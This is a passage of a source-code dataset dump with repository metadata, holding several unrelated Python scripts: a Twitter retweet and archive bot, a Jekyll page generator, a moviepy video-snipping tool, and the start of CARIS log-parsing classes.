] | null | null | null | highearthorbit.py | orithena/highearthorbit | a444dba54f6fdb5b84cf5bd4c3e24f4bd1796fb1 | [
"MIT"
] | null | null | null | #!/usr/bin/python
import twython, time, pprint, traceback, os, sys
import config
from twython import TwythonStreamer, TwythonError, TwythonRateLimitError
import urllib, json, glob, re
import thread
queuelock = thread.allocate_lock()
watchlock = thread.allocate_lock()
import logging
logging.basicConfig(filename='highearthorbit.log', format='%(asctime)s %(levelname)s %(message)s')
log = logging.getLogger(__name__)
log.setLevel(logging.INFO)
"""
Config: create a file named config.py with these lines:
app_key="<your app key>"
app_secret="<your app secret>"
oauth_token="<your oauth token>"
oauth_token_secret="<your oauth token secret>"
owner="<twitter name of owner>"
All keys, secrets and tokens are creatable on http://apps.twitter.com
Run: until I implement a better solution, run it in a screen session
"""
lasttry=0
rts = []
_queue = []
_fail = {}
_done = {}
friends = []
listmembers = []
blocked = []
twitter = None
user_screenname = ''
def update_friends(friendlist):
global friends
friends = friendlist
log.info("Updated friends", friends)
def update_approved_list():
global listmembers
try:
listmembers = [ user["id"] for user in twitter.get_list_members(slug=config.approved_list['name'], owner_screen_name=config.approved_list['owner'])["users"] ]
log.info("Updated members of list %s by @%s: %s", (config.approved_list['name'], config.approved_list['owner'], str(listmembers)))
except:
log.warning("Error updating list %s by @%s." % (config.approved_list['name'], config.approved_list['owner']))
def find_and_delete_blocked_retweets():
global blocked
log.info("Checking the last 100 tweets in my timeline for retweets of blocked users. Just to destroy them.")
try:
tl = twitter.get_user_timeline(screen_name=user_screenname, count=100)
except:
log.error('Exception caught while checking for tweets of blocked users.')
else:
for t in tl:
if 'retweeted_status' in t and t['retweeted_status']['user']['id'] in blocked:
queue(twitter.destroy_status, id=t['id'])
log.info('Will destroy status %s, because @%s is blocked.' % (t['id'], t['retweeted_status']['user']['screen_name']))
for archived_file in glob.glob(os.path.join(config.archive_dir, '*', t['retweeted_status']['id_str']) + '-*.*'):
try:
os.remove(archived_file)
except:
log.warning("Unable to delete archive file %s" % archived_file)
else:
log.info("Removed archive file %s" % archived_file)
def update_block_list():
global blocked
old_blocked = blocked
try:
blocked = twitter.list_block_ids()['ids']
log.info("Updated block list.")
except Exception as e:
log.warning("Could not update block list: %s", str(e))
new = list(set(blocked) - set(old_blocked))
if len(new) > 0:
find_and_delete_blocked_retweets()
def cleanrts():
for r in rts:
m,t = r
if t < time.time() - 3600:
rts.remove(r)
def _fmt(func, args, kwargs):
return "%s(%s)" % (func.__name__, ', '.join([ a for a in args ] + [ "%s=%s" % (k, repr(v)) for k,v in kwargs.iteritems() ]))
def run_queue():
global _done, _queue, _fail, twitter
with queuelock:
t = int(time.time())
_done = dict([ (k,v) for k,v in _done.iteritems() if k > t - 86400 ])
_fail = dict([ (k,v) for k,v in _fail.iteritems() if k > t - 3600 ])
log.info('Running queue (%s actions). Actions during last 24h: %s/last 15m: %s, Fails in the last 60m: %s.' % (len(_queue), len(_done), len([ k for k,v in _done.iteritems() if k > t - 900 ]), len(_fail)))
with queuelock:
while len(_queue) > 0 and twitter is not None:
t = int(time.time())
if len([ k for k,v in _done.iteritems() if k > t - 900 ]) + len([ k for k,v in _fail.iteritems() if k > t - 900 ]) >= config.rate_limit_per_15min:
log.warn("Rate Limit reached. Currently not working on the %s items in the queue." % len(_queue))
break
if len(_fail) > 15:
log.error("Fail Limit reached. Killing everything.")
thread.interrupt_main()
(tries, (func, args, kwargs)) = _queue.pop(0)
if not (func, args, kwargs) in _done.values():
try:
log.debug("Trying %s from queue" % _fmt(func, args, kwargs))
if not config.twitter_is_read_only:
func(*args, **kwargs)
except Exception as e:
if isinstance(e, TwythonError) and e.error_code == 403:
log.warn("Twitter says I did %s already." % _fmt(func, args, kwargs))
#_fail[t] = (func, args, kwargs)
elif isinstance(e, TwythonRateLimitError):
log.warn("Twitter says I hit the Rate Limit with %s. Re-queuing." % _fmt(func, args, kwargs))
_queue.insert(0, (tries, (func, args, kwargs)) )
if e.retry_after is not None:
log.warn("Keeping queue lock until I slept for %s seconds." % e.retry_after)
time.sleep(int(e.retry_after))
elif tries < 3:
log.error("Error while running queue item %s: %s" % (_fmt(func, args, kwargs), str(e)), exc_info=True)
_queue.append( (tries+1, (func, args, kwargs)) )
_fail[t] = (func, args, kwargs)
log.warn("Try #%s of %s from queue failed, re-queuing." % (tries+1, _fmt(func, args, kwargs)))
log.warn("Reinitializing twitter connection except streaming.")
twitter = twython.Twython(app_key=config.app_key, app_secret=config.app_secret, oauth_token=config.oauth_token, oauth_token_secret=config.oauth_token_secret)
else:
log.error("Tried 3 times, but always got an exception... giving up on %s" % _fmt(func, args, kwargs))
else:
_done[t] = (func, args, kwargs)
log.info("%s is done." % _fmt(func, args, kwargs))
else:
log.warn("I already had that one in my queue: %s" % _fmt(func, args, kwargs))
time.sleep(5)
def queuewatch(check_time=900):
if watchlock.acquire(0):
while True:
time.sleep(check_time)
log.debug("It's time to check the queue for any forgotten actions. (interval=%ss)" % check_time)
try:
update_block_list()
run_queue()
except Exception as e:
log.warning("Exception in watchdog thread: ", e)
watchlock.release()
def queue(func, *args, **kwargs):
global _queue
_queue.append( (0, (func, args, kwargs)) )
log.debug("Queued %s." % _fmt(func, args, kwargs))
def rt(tweetid):
cleanrts()
if twitter is not None:
if not tweetid in [ m for m,t in rts ]:
log.info("Will retweet id %s" % tweetid)
queue(twitter.retweet, id=tweetid)
rts.append( (tweetid, time.time(), ) )
else:
log.info("Tweet id %s has been retweeted already." % tweetid)
def tweet(tweettext):
if twitter is not None:
queue(twitter.update_status, status=tweettext[0:140])
def download_media(data, filename):
datadict = data['entities']
if 'extended_entities' in data and 'media' in data['extended_entities']:
datadict = data['extended_entities']
if 'extended_tweet' in data:
if 'entities' in data['extended_tweet'] and 'media' in data['extended_tweet']['entities']:
datadict = data['extended_tweet']['entities']
if 'extended_entities' in data['extended_tweet'] and 'media' in data['extended_tweet']['extended_entities']:
datadict = data['extended_tweet']['extended_entities']
for index,mediadata in enumerate(datadict['media']):
mediafile = '.'.join((filename, str(index), mediadata['media_url_https'].split('.')[-1]))
mediaurl = ':'.join((mediadata['media_url_https'], 'orig'))
if 'type' in mediadata and mediadata['type'] == 'photo':
try:
urllib.URLopener().retrieve(mediaurl, mediafile)
log.info("Archived media: %s -> %s from tweet %s." % (mediaurl, mediafile, data['id']))
except Exception as e:
log.error("Archive image cannot be downloaded from %s or created in %s: %s" % (mediaurl, mediafile, str(e)))
def save(data):
user = data['retweeted_status']['user'] if 'retweeted_status' in data else data['user']
basedirname = os.path.join(config.archive_dir, data['id_str'][:-15].zfill(6))
basefilename = '-'.join((data['id_str'], user['screen_name']))
filename = os.path.join(basedirname, basefilename)
if os.path.isfile(filename + '.json'):
log.warn("Archive file %s.json for tweet %s already exists." % (filename, data['id']))
return
try:
if not os.path.isdir(basedirname):
os.makedirs(basedirname)
except Exception as e:
log.error("Archive directory %s cannot be created or is not writable: %s" % (basedirname, str(e)))
return
try:
with open(filename + '.json', 'w') as f:
json.dump(data, f, indent=4)
log.info("Archived tweet %s to %s.json" % (data['id'], filename))
except Exception as e:
log.error("Archive file %s cannot be created or is not writable: %s" % (filename + '.json', str(e)))
return
if config.archive_photos and 'media' in data['entities']:
download_media(data, filename)
def is_spam(data):
log.info("%s @%s: %s" % (data['id'], data['user']['screen_name'], data['text'].replace('\n', ' ')))
text = data['text'].strip()
if not any(hashtag in text.lower() for hashtag in config.track.lower().split(" or ")):
log.info("Retweet did not contain our search, assuming spam.")
return True
if text.startswith('"') and text.endswith('"'):
log.info("Looks like a quoted Tweet, assuming tweet stealing.")
return True
if re.search(r'rt\W+@\w+\W*[:"]', text, re.IGNORECASE) is not None:
log.info("Looks like a manual retweet, assuming tweet stealing.")
return True
if len(data['entities']['hashtags']) > config.spamfilter_max_hashtags: # Too many hashtags?
log.info("Munched some Spam: Too many Hashtags. Not retweeting %s." % data['id'])
return True
if any(word.lower() in text.lower() for word in config.spamfilter_word_blacklist): # Blacklisted words?
log.info("This list of words is black. It contains %s, which is why I won't retweet %s." % (str([word for word in config.spamfilter_word_blacklist if word in data['text']]), data['id']))
return True
return False
def decide(data):
if 'extended_tweet' in data and 'full_text' in data['extended_tweet']:
data['text'] = data['extended_tweet']['full_text']
if 'full_text' in data:
data['text'] = data['full_text']
if config.archive_own_retweets_only and 'retweeted_status' in data and data['user']['screen_name'] == user_screenname:
log.info("%s @%s: %s" % (data['id'], data['user']['screen_name'], data['text'].replace('\n', ' ')))
# I only save my own retweets for the archive. This allows the webviewer to "dumb-detect" that
# a Retweet by the Bot has been destroyed manually from the Botaccount.
save(data)
elif 'retweeted_status' in data:
# Normal retweets are only logged in debug level, else dropped silently.
log.debug("Retweet received: %s @%s: %s" % (data['id'], data['user']['screen_name'], data['text'].replace('\n', ' ')))
return
elif is_spam(data):
# If it's spam, the function is_spam() has already logged a message. We're just walking away.
return
elif 'text' in data:
# Hey, something came in! Maybe it's interesting?
#log.info("%s @%s: %s" % (data['id'], data['user']['screen_name'], data['text'].replace('\n', ' ')))
if data['user']['id'] in blocked:
# If we blocked someone, we don't want to read him. Twitter, why do I keep getting that blockhead in my search results?
log.info('Not retweeting id %s because user @%s is blocked.' % (data['id'], data['user']['screen_name']))
#elif data['text'].lower().find(config.track.lower()) > -1 and not 'retweeted_status' in data:
elif not 'retweeted_status' in data:
# Whohoo! A tweet that actually contains our Hashtag and is not a retweet!
rt(data['id'])
if not config.archive_own_retweets_only:
# I save everything I can get. Okay, archiving photos are configured elsewhere.
save(data)
elif 'direct_message' in data:
# Currently dead code because this type of message is not available in a "site stream".
# To enable this, this Bot also needs to follow the "user stream" in another thread.
update_approved_list()
log.info("DM from @%s: %s" % (data['direct_message']['sender']['screen_name'], data['direct_message']['text']))
if data['direct_message']['sender']['id'] in listmembers:
tweet(data['direct_message']['text'])
elif 'friends' in data:
# Currently dead code because this type of message is not available in a "site stream".
# To enable this, this Bot also needs to follow the "user stream" in another thread.
update_friends(data['friends'])
else:
# Currently dead code because this type of message is not available in a "site stream".
# To enable this, this Bot also needs to follow another stream in another thread.
log.warning("Unknown notification received:")
log.warning(data)
class MyStreamer(TwythonStreamer):
def on_success(self, data):
decide(data)
thread.start_new_thread(run_queue, ())
def on_error(self, status_code, data):
log.error("Error Code %s received in data package:" % status_code)
log.error(data)
if status_code == 503:
log.error("Waiting 10 minutes, then this bot restarts internally... hopefully finding all missed tweets then.")
time.sleep(600)
self.disconnect()
if __name__ == "__main__":
readback = config.read_back
if '--quick' in sys.argv:
readback = 10
log.info("------ Quick start, reading only 10 tweets back")
while True:
try:
log.info("====== Entering High Earth Orbit in the Twitterverse... ehm. Okay, okay, I'm initializing. ======")
twitter = twython.Twython(app_key=config.app_key, app_secret=config.app_secret, oauth_token=config.oauth_token, oauth_token_secret=config.oauth_token_secret)
creds = twitter.verify_credentials()
#userstream = MyStreamer(config.app_key, config.app_secret, config.oauth_token, config.oauth_token_secret)
#userstream.creds = creds
filterstream = MyStreamer(config.app_key, config.app_secret, config.oauth_token, config.oauth_token_secret)
filterstream.creds = creds
userid = creds['id_str']
user_screenname = creds['screen_name']
update_approved_list()
update_block_list()
log.info('Reading last retweets.')
rts += [ (t['retweeted_status']['id'], time.time(),) for t in twitter.get_user_timeline(screen_name=user_screenname, count=readback) if 'retweeted_status' in t ]
for a in (1,2):
time.sleep((a-1)*10)
log.info("Catching up on missed tweets, take %s." % a)
old_tweets = twitter.search(q=config.track + " -filter:retweets", count=readback-5, tweet_mode='extended')['statuses']
for t in sorted(old_tweets, key=lambda t: t['id']):
decide(t)
log.info('Caught up on missed tweets, running queue.')
thread.start_new_thread(run_queue, ())
thread.start_new_thread(queuewatch, (900,))
log.info('Going into streaming mode')
filterstream.statuses.filter(track=[t.strip() for t in config.track.lower().split(' or ')])
except Exception, e:
log.warning('==Exception caught, restarting in 15 minutes==')
log.warning(str(e), exc_info=True)
time.sleep(900)
readback = config.read_back
| 49.143275 | 208 | 0.606057 | 2,216 | 16,807 | 4.481047 | 0.199007 | 0.019738 | 0.028197 | 0.01712 | 0.292346 | 0.211782 | 0.176032 | 0.1572 | 0.150554 | 0.117321 | 0 | 0.007423 | 0.262569 | 16,807 | 341 | 209 | 49.28739 | 0.793771 | 0.092402 | 0 | 0.216607 | 0 | 0.01083 | 0.23314 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.021661 | null | null | 0.00361 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
df92c2b640273d1fde6e35ef399b77e27ac3c838 | 6,847 | py | Python | script.py | Relex12/mywebsite_jekyll | 58a4536c3049f0f575b60dbcfb33789ea1a909ea | [
"MIT"
] | null | null | null | script.py | Relex12/mywebsite_jekyll | 58a4536c3049f0f575b60dbcfb33789ea1a909ea | [
"MIT"
] | null | null | null | script.py | Relex12/mywebsite_jekyll | 58a4536c3049f0f575b60dbcfb33789ea1a909ea | [
"MIT"
] | null | null | null | from os import path
from os import system
if (not path.exists("../Relex12.github.io/")):
raise FileNotFoundError("Relex12.github.io directory not found")
if (not path.exists("../Markdown-Table-of-Contents/")):
raise FileNotFoundError("Markdown-Table-of-Contents directory not found")
#####################
# FILES DECLARATION #
#####################
files = [
{"folder": "Decentralized-Password-Manager", "file":"README.md", "layout": "default",
"title": "Decentralized-Password-Manager", "link": "fr/Decentralized-Password-Manager", "output": "Decentralized-Password-Manager.md"},
{"folder": "Dictionaries", "file":"README.md", "layout": "default",
"title": "Dictionaries", "link": "Dictionaries", "output": "Dictionaries.md"},
{"folder": "Dictionaries", "file":"README-fr.md", "layout": "default",
"title": "Dictionaries", "link": "fr/Dictionaries", "output": "Dictionaries-fr.md"},
{"folder": "Genex", "file":"README.md", "layout": "default",
"title": "Genex", "link": "fr/Genex", "output": "Genex.md"},
{"folder": "Introduction-to-Computer-Science", "file":"README.md", "layout": "default",
"title": "Introduction to Computer Science", "link": "fr/Introduction-to-Computer-Science", "output": "Introduction-to-Computer-Science.md"},
{"folder": "Languages", "file":"README.md", "layout": "default",
"title": "Languages", "link": "fr/Languages", "output": "Languages.md"},
{"folder": "Languages", "file":"Sheets/Bash-Unix.md", "layout": "default",
"title": "Bash Unix", "link": "fr/Languages/Bash-Unix", "output": "Languages.Bash-Unix.md"},
{"folder": "Languages", "file":"Sheets/DOT.md", "layout": "default",
"title": "DOT", "link": "fr/Languages/DOT", "output": "Languages.DOT.md"},
{"folder": "Languages", "file":"Sheets/Git.md", "layout": "default",
"title": "Git", "link": "fr/Languages/Git", "output": "Languages.Git.md"},
{"folder": "Languages", "file":"Sheets/GDB.md", "layout": "default",
"title": "GDB", "link": "fr/Languages/GDB", "output": "Languages.GDB.md"},
{"folder": "Languages", "file":"Examples/Markdown.md", "layout": "default",
"title": "Markdown", "link": "fr/Languages/Markdown", "output": "Languages.Markdown.md"},
{"folder": "Languages", "file":"Sheets/JavaScript.md", "layout": "default",
"title": "JavaScript", "link": "fr/Languages/JavaScript", "output": "Languages.JavaScript.md"},
{"folder": "Lining-draw", "file":"README.md", "layout": "default",
"title": "Lining draw", "link": "Lining-draw", "output": "Lining-draw.md"},
{"folder": "Lining-draw", "file":"README-fr.md", "layout": "default",
"title": "Lining draw", "link": "fr/Lining-draw", "output": "Lining-draw-fr.md"},
{"folder": "Loup-garou", "file":"README.md", "layout": "default",
"title": "Loup-garou", "link": "fr/Loup-garou", "output": "Loup-garou.md"},
{"folder": "Markdown-Table-of-Contents", "file":"README.md", "layout": "default",
"title": "Markdown Table of Contents", "link": "Markdown-Table-of-Contents", "output": "Markdown-Table-of-Contents.md"},
{"folder": "Markdown-Table-of-Contents", "file":"README-fr.md", "layout": "default",
"title": "Markdown Table of Contents", "link": "fr/Markdown-Table-of-Contents", "output": "Markdown-Table-of-Contents-fr.md"},
{"folder": "Maths-for-IT", "file":"README.md", "layout": "default",
"title": "Maths for IT", "link": "fr/Maths-for-IT", "output": "Maths-for-IT.md"},
{"folder": "Relex12", "file":"README.md", "layout": "default",
"title": "Relex12 - Adrian Bonnet", "link": "null", "output": "index.md"},
{"folder": "Secret-Santa", "file":"README.md", "layout": "default",
"title": "Secret Santa", "link": "fr/Secret-Santa", "output": "Secret-Santa.md"},
{"folder": "Simple-Progress-Bar", "file":"README.md", "layout": "default",
"title": "Simple Progress Bar", "link": "Simple-Progress-Bar", "output": "Simple-Progress-Bar.md"},
{"folder": "Simple-Progress-Bar", "file":"README-fr.md", "layout": "default",
"title": "Simple Progress Bar", "link": "fr/Simple-Progress-Bar", "output": "Simple-Progress-Bar-fr.md"},
{"folder": "Voting-Systems-Comparison", "file":"README.md", "layout": "default",
"title": "Voting Systems Comparison", "link": "fr/Voting-Systems-Comparison", "output": "Voting-Systems-Comparison.md"},
{"folder": "Voting-Systems-Simulation", "file":"README.md", "layout": "default",
"title": "Voting Systems Simulation", "link": "Voting-Systems-Simulation", "output": "Voting-Systems-Simulation.md"},
{"folder": "Voting-Systems-Simulation", "file":"README-fr.md", "layout": "default",
"title": "Voting Systems Simulation", "link": "fr/Voting-Systems-Simulation", "output": "Voting-Systems-Simulation-fr.md"},
{"folder": "Voting-Systems-Simulation", "file":"doc/simulation.html", "layout": "null",
"title": "Voting Systems Simulation Doc", "link": "Voting-Systems-Simulation/doc/simulation", "output": "Voting-Systems-Simulation.doc.simulation.html"},
{"folder": "Voting-Systems-Simulation", "file":"doc/voting.html", "layout": "null",
"title": "Voting Systems Simulation Doc", "link": "Voting-Systems-Simulation/doc/voting", "output": "Voting-Systems-Simulation.doc.voting.html"},
{"folder": "Website-manager", "file":"README.md", "layout": "default",
"title": "Website manager", "link": "Website-manager", "output": "Website-manager.md"},
{"folder": "Word-machine", "file":"README.md", "layout": "default",
"title": "Word Machine", "link": "Word-machine", "output": "Word-machine.md"},
{"folder": "Word-machine", "file":"doc/dictionary.html", "layout": "null",
"title": "Word Machine Doc", "link": "Word-machine/doc/dictionary", "output": "Word-machine.doc.dictionary.html"},
{"folder": "Word-machine", "file":"doc/generation.html", "layout": "null",
"title": "Word Machine Doc", "link": "Word-machine/doc/generation", "output": "Word-machine.doc.generation.html"},
{"folder": "Word-machine", "file":"doc/word-machine.html", "layout": "null",
"title": "Word Machine Doc", "link": "Word-machine/doc/word-machine", "output": "Word-machine.doc.word-machine.html"},
]
####################
# FILES GENERATION #
####################
for i in range(len(files)):
if (path.exists("../{}/".format(files[i]["folder"]))):
system("python3 ../Markdown-Table-of-Contents/toc.py ../{}/{}".format(files[i]["folder"], files[i]["file"]))
input_file = open("../{}/{}".format(files[i]["folder"], files[i]["file"]), 'r')
front_matter = """---
layout: {}
title: "{}"
permalink: {}
---
""".format(files[i]["layout"], files[i]["title"], files[i]["link"], )
output_file = open("../Relex12.github.io/{}".format(files[i]["output"]), 'w')
print(files[i]["output"])
output_file.write(front_matter + input_file.read())
else:
print("Cannot create {}, {}/{} is missing.".format(files[i]["output"], files[i]["folder"], files[i]["file"]) )
| 67.792079 | 154 | 0.637505 | 816 | 6,847 | 5.341912 | 0.121324 | 0.049553 | 0.092911 | 0.123882 | 0.545309 | 0.432668 | 0.317963 | 0.186281 | 0.114935 | 0.069511 | 0 | 0.001778 | 0.096393 | 6,847 | 100 | 155 | 68.47 | 0.702764 | 0.005112 | 0 | 0 | 0 | 0 | 0.660175 | 0.209843 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.022989 | 0.022989 | 0 | 0.022989 | 0.022989 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
10c36b8fc1840cfb5a40958316805cad9712d3bb | 8,254 | py | Python | snipmyvideo.py | rascoro1/SnipMyVideo | 0728684fa271ec140f90c7878e41d7e55eec1989 | [
"MIT"
] | 3 | 2016-07-22T00:34:50.000Z | 2016-09-02T16:52:23.000Z | snipmyvideo.py | rascoro1/SnipMyVideo | 0728684fa271ec140f90c7878e41d7e55eec1989 | [
"MIT"
] | 2 | 2016-09-06T04:11:44.000Z | 2018-01-29T21:57:51.000Z | snipmyvideo.py | rascoro1/SnipMyVideo | 0728684fa271ec140f90c7878e41d7e55eec1989 | [
"MIT"
] | 1 | 2016-09-02T20:39:25.000Z | 2016-09-02T20:39:25.000Z | from moviepy.editor import *
from moviepy import Clip
import sys
import os
"""
This is a simple script that can only snip your video and return the snippets as one video.
This script requires moviepy.
It can be obtained through pip:
pip install moviepy
The output file can be '.mp4', '.ogv' or '.webm'.
You can modify the script to output other file types based on the codec.
For details, see moviepy.VideoFileClip.write_videofile.
Usage: SnipMyVideo.py video.mp4 output.mp4 30-60 90-120 20:20-20:40 1:20:15-1:30:15
E.g.: This would create four snippets (an unlimited number of snippets can be created);
the first snippet covers the time 30 seconds to 60 seconds from video.mp4.
These snippets are then concatenated and written to output.mp4.
Only a couple of lines actually use moviepy.
"""
###################### Declaring Globals ##################################
SCRIPT_NAME = "" # Name of the script
FNAME = "" # Input filename
OUT_FNAME = "" # Output filename
SNIPPETS = [] # Raw Snippet times given as arguments by the user
SNIPPET_TIMES = [] # Snippet times in seconds
VERBOSE = True # Turn to false if you would not like verbose information
IS_AUDIO_FILE = False
def check_num_of_arguments():
"""
Quick check to make sure the correct number of argumets are portrayed.
First function that is called
:return:
"""
if len(sys.argv) < 4:
print "You have not given enough Arguments"
print "usage: " + sys.argv[0] + " inputfile.mp4 outputfile.mp4 20-30"
print "Time is in seconds"
sys.exit(6)
def trim_arguments():
"""
This trims all of the input arguments from the user
and assagins information to the according global variable
:return:
"""
global SCRIPT_NAME, FNAME, OUT_FNAME, SNIPPETS
SCRIPT_NAME = sys.argv[0]
    args = sys.argv[1:] # Trimming off SCRIPT_NAME
    FNAME = args[0]
    args = args[1:] # Trimming off FNAME
OUT_FNAME = args[0]
SNIPPETS = args[1:] # Trimming off the output filename
del args # Delete old args (REPLACED BY GLOBAL)
def check_args():
"""
Make sure arguments are in the write format
"""
if not os.path.isfile(FNAME):
print "The Input file does not exist."
sys.exit(1)
if os.path.isfile(OUT_FNAME):
print "Output file already exists"
sys.exit(2)
if not os.path.isdir(os.path.abspath(OUT_FNAME).rstrip(os.path.basename(OUT_FNAME))):
print "Output file directory does not exists"
sys.exit(3)
def check_time(time, min, max):
"""
Check time submitted by user to make sure time is correct and follows a correct format
:param time: time requested by user
:param min: min possible value
:param max: max possible value
:return:
"""
if int(time) >= min and int(time) <= max:
return True
else:
return False
def convert_human_readable_time(time):
"""
Convert human readable format of time into seconds
:param time: human readable string format of 1:20:30 or 20:38 or 38
:return: int time in seconds
"""
if ':' in time: # The time follows the min:sec format and must be converted
time = time.split(':')
if len(time) == 2: # Min:Sec format
min, sec = time
verbose("convert_human_readable_time("+str(time)+")", "Min:Sec Format")
if check_time(min, 0, 59) and check_time(sec, 0, 59): # Making sure the times are between possible amounts
verbose("convert_human_readable_time(" + str(time) + ")", "time = " + str(min) + " * 60 + " + sec)
time = int(min) * 60 + int(sec)
else:
print("Incorrect Time has been submitted: " + str(time) + " min:sec 0:0-59:60")
sys.exit(10)
elif len(time) == 3: # Hour:Min:Sec format
hour, min, sec = time
verbose("convert_human_readable_time("+str(time)+")", "Hour:Min:Sec Format")
if check_time(hour, 0, 23) and check_time(min, 0, 59) and check_time(sec, 0, 59): # Making sure the times are between possible amounts
verbose("convert_human_readable_time(" + str(time) + ")", "time = " + str(hour) + " * 3600 + " + str(min) + " * 60 + " + sec)
time = int(hour) * 3600 + int(min) * 60 + int(sec)
else:
print("Incorrect Time has been submitted: " + str(time) + " hour:min:sec 0:0:0-23:59:59")
sys.exit(10)
try:
time = int(time)
except ValueError as e:
print "Value Error: Given time is not a digit" + e.message
sys.exit(8)
verbose("convert_human_readable_time(" + str(time) + ")", "Returned time is -> " + str(time))
return time # If the time does not need to be converted (does not contain ':') it will still be appened
def get_snippet_time(snippet):
"""
This allows for easier use of snipping longer videos
conversion of
hour:min:sec & min:sec & sec e.g 1:20:15 & 20:48 & secs
to seconds
:param args: One snippet of time start and end time
:return: Dict of snippet e.g. {'start':20, 'stop': 40}
"""
if "-" not in snippet: # Checking to see if snippet time was inputted correctly
print("The arguments for the snippet time is not in the correct format: " + snippet)
print("Correct usage is: 20-30 or 20:30-20:35 or 1:20:30-1:20:35 ")
sys.exit(7)
start, stop = snippet.split('-', 1) # start and stop times of snippet
start = convert_human_readable_time(start)
stop = convert_human_readable_time(stop)
snippet = {'start': start, 'stop': stop}
return snippet
def get_all_snippet_times():
"""
Get all the snippet times in seconds
:return:
"""
for snippet in SNIPPETS:
snippet = get_snippet_time(snippet)
for key in snippet:
if snippet[key] < 0:
print "Input must be a positive number"
sys.exit(5)
if snippet['start'] > snippet['stop']:
print('Start needs to be smaller than stop for snipet, exiting.')
verbose("check_args()", "start=" + str(snippet['start']) + ", stop="+str(snippet['stop']))
sys.exit(6)
SNIPPET_TIMES.append(snippet)
def determine_if_audio_file():
"""
"""
global IS_AUDIO_FILE
audio_file_extensions = (".mp3", ".m4a")
IS_AUDIO_FILE = True if FNAME.endswith(audio_file_extensions) else False
def get_snippets():
"""
:return: List of moviepy.subclip objects
"""
snippets = []
clip = AudioFileClip(FNAME) if IS_AUDIO_FILE else VideoFileClip(FNAME)
for snippet in SNIPPET_TIMES:
snippets.append(clip.subclip(snippet['start'], snippet['stop']))
print "Created Snippet:\n\tStarting: " + str(snippet['start']) + " STOPPING: " + str(snippet['stop'])
return snippets
def create_video(snippets):
"""
    Concatenate all the snippets together into one movie and write it out
    :param snippets: This is a list of moviepy.subclip
:return: write out one file
"""
if not IS_AUDIO_FILE:
video = concatenate(snippets)
print "Combined Snipets into one Video"
print "Writing Video to " + OUT_FNAME
video.write_videofile(OUT_FNAME)
else:
audio = concatenate_audioclips(snippets)
print "Combined Snipets into one Audio File"
print "Writing Video to " + OUT_FNAME
audio.write_audiofile(OUT_FNAME)
def verbose(title, info):
"""
    Logging verbose notes when VERBOSE is True
    Used for debugging and is very helpful
:param title:
:param info:
:return:
"""
if VERBOSE:
print SCRIPT_NAME + " -> " + str(title) + ": " + info
if __name__ == "__main__":
check_num_of_arguments() # Make sure we have the correct number of arguments
trim_arguments() # Trim the args to just have the snippets at the end
check_args() # check the args for correctness
    get_all_snippet_times() # All snippet times in seconds and organized; also checked for correctness
determine_if_audio_file()
snippets = get_snippets() # Get all the moviepy.subclip objects for each snippet
    create_video(snippets) # Concatenate the Snippets together
| 34.974576 | 146 | 0.63448 | 1,156 | 8,254 | 4.439446 | 0.239619 | 0.01286 | 0.035074 | 0.037412 | 0.15608 | 0.133476 | 0.096259 | 0.088854 | 0.088854 | 0.088854 | 0 | 0.026286 | 0.257936 | 8,254 | 235 | 147 | 35.123404 | 0.811592 | 0.118003 | 0 | 0.080645 | 0 | 0.008065 | 0.205354 | 0.032161 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.032258 | null | null | 0.153226 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
10d2a94ebd88d32ad26b964e29b12c2b154a5761 | 7,858 | py | Python | HSTB/drivers/hips_log.py | noaa-ocs-hydrography/drivers | d798a851b7b06c986c811a84242529038fd0b2b3 | [
"CC0-1.0"
] | 2 | 2021-04-28T17:37:30.000Z | 2022-01-28T21:56:17.000Z | HSTB/drivers/hips_log.py | noaa-ocs-hydrography/drivers | d798a851b7b06c986c811a84242529038fd0b2b3 | [
"CC0-1.0"
] | 1 | 2020-11-05T13:57:34.000Z | 2020-11-05T14:00:26.000Z | HSTB/drivers/hips_log.py | noaa-ocs-hydrography/drivers | d798a851b7b06c986c811a84242529038fd0b2b3 | [
"CC0-1.0"
] | 1 | 2021-04-09T08:29:54.000Z | 2021-04-09T08:29:54.000Z | import xml.etree.ElementTree as ElementTree
import os
class CARISObject:
"""A generic CARIS object with a name"""
    def __init__(self, name=''):
        """Initialize with a name (empty string by default)"""
        self.name = name
def set_name(self, name):
"""Set the name"""
if name:
self.name = name
def get_name(self):
"""Return the name"""
return self.name
class CARISSource(CARISObject):
"""A CARIS source object under Process Model 1.0"""
def __init__(self):
"""Initialize with empty name, type and data"""
self.name = ''
self.stype = ''
self.sdata = ''
def set_type(self, dtype):
"""Set the type"""
if dtype:
self.stype = dtype
def set_data(self, data):
"""Set the data"""
if data:
self.sdata = data
def get_type(self):
"""Return the type"""
return self.stype
def get_data(self):
"""Return the data"""
return self.sdata
class CARISLog():
"""A CARIS log object under Process Model 1.0"""
def __init__(self):
"""Initialize with empty user, software, start/end times"""
self.user = ''
self.software = ''
self.startTime = ''
self.endTime = ''
def set_user(self, user):
"""Set the user"""
if user:
self.user = user
def set_software(self, software):
"""Set the software"""
if software:
self.software = software
def set_start_time(self, startTime):
"""Set the start time"""
if startTime:
self.startTime = startTime
def set_end_time(self, endTime):
"""Set the end time"""
if endTime:
self.endTime = endTime
def get_user(self):
"""Return the user"""
return self.user
def get_software(self):
"""Return the software"""
return self.software
def get_start_time(self):
"""Return the start time"""
return self.startTime
def get_end_time(self):
"""Return the end time"""
return self.endTime
class CARISPort(CARISObject):
